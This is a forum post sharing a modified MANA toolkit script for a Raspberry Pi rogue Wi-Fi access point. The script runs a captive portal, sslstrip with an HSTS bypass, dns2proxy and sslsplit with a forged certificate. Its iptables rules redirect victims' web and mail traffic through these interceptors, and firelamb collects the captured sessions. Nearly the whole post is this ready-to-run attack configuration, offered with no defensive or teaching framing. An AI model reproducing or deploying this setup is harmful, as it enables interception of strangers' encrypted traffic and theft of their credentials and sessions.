Jump to content

zakvuil

Members
 View Profile  See their activity

  • Posts

    1

  • Joined

  • Last visited

 Content Type 

Posts posted by zakvuil

    raspberry pi b+ mana-tool kit. hack google...

    in Hacks & Mods

    Posted

    Hi guys,

    I've got a Pi running up with the complete setup using mana and nodogsplash and a portal.

    There's a trick using nodogsplash and redirection ssl traffic using sslsplitter, because nodogsplash modifies the rulebase of iptables. Checkout the modified config:

    .

    .

    .

    #Starting Portal
    echo Starting Portal
    service apache2 start
    nodogsplash -f -c ~/mana/run-mana/spot/nodogsplash-portal.conf &
    sleep 5

    #SSLStrip with HSTS bypass
    cd /usr/share/mana-toolkit/sslstrip-hsts/
    python sslstrip.py -l 10080 -a -w /var/www/portals/spot/logs/sslstrip/sslstrip.log&
    python dns2proxy.py $phy&
    cd -


    #SSLSplit
    sslsplit -D -Z -S /var/lib/mana-toolkit/sslsplit -c /var/www/portals/spot/cert/spot-secure.crt -k /var/www/portals/spot/cert/spot-secure.key -O -l /var/www/portals/spot/logs/sslsplit/sslsplit-connect.log \
    https 0.0.0.0 10443 \
    ssl 0.0.0.0 10993 \
    tcp 0.0.0.0 10143 \
    ssl 0.0.0.0 10995 \
    tcp 0.0.0.0 10110 \
    ssl 0.0.0.0 10465 \
    tcp 0.0.0.0 10025&

    iptables -t nat -D PREROUTING 1
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10080
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 443 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10443
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 143 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10143
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 993 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10993
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 465 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10465
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 25 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10025
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 995 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10995
    iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 110 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10110
    iptables -t nat -A PREROUTING -i $phy -m mark --mark 0x200/0x700 -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -m mark --mark 0x400/0x700 -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -d 0.0.0.0/0 -p tcp --dport 53 -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -d 0.0.0.0/0 -p udp --dport 53 -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -d 10.0.0.1 -p tcp --dport 80 -j ACCEPT
    iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:2050
    iptables -t nat -A PREROUTING -i $phy -j ACCEPT

    # Start FireLamb
    ~/mana/run-mana/spot/firelamb.py -i wlan0 -t /var/www/portals/spot/logs/sslsplit/ -s /var/www/portals/spot/logs/sslspl/sslsplit-connect.log&
    echo "Hit enter to kill me"
    read

    .

    .

    .

×
×
  • Create New...